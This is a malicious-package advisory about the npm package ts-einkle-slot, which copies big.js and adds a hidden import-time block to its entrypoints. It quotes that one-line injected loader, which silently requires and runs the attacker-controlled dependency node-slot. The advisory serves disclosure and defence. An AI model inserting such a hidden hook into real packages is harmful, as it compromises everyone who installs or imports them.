MAL-2026-6525
Malicious code in ts-einkle-slot (npm)
Details
## Source: amazon-inspector (f565a21645ed6a288a820dea60e648589a5cca95a91b2c90720f3d2bcadca73b)

Package is published as `ts-einkle-slot`, but its tarball contents (source, README, LICENCE, and the package.json author/repository/description fields) are copied verbatim from Michael Mclaughlin's legitimate `big.js` package, presenting a spoofed publisher identity. The CommonJS and ESM entrypoints (`big.js` and `big.mjs`, referenced from `main`/`module`/`exports`) contain an injected top-level block:

`try { const doc = require('node-slot'); doc.from_str().then(e => {}).catch(e => {}) } catch (error) {}`

This causes the transitive dependency `node-slot` (pulled in via the declared `ts-einkle` dependency) to be loaded and its `from_str()` invoked the moment any consumer `require`s or `import`s this package, with errors silently swallowed so the host package keeps functioning as a drop-in big.js replacement. The package's advertised purpose is decimal arithmetic; there is no legitimate reason to load an unrelated `node-slot` runtime module on import. Installer harm is delivered by the attacker-controlled transitive `node-slot`, which is pulled into the install tree solely by virtue of installing this package.
Affected packages
No fixed version published yet for ts-einkle-slot (npm). Pin to a known-safe version or switch to an alternative.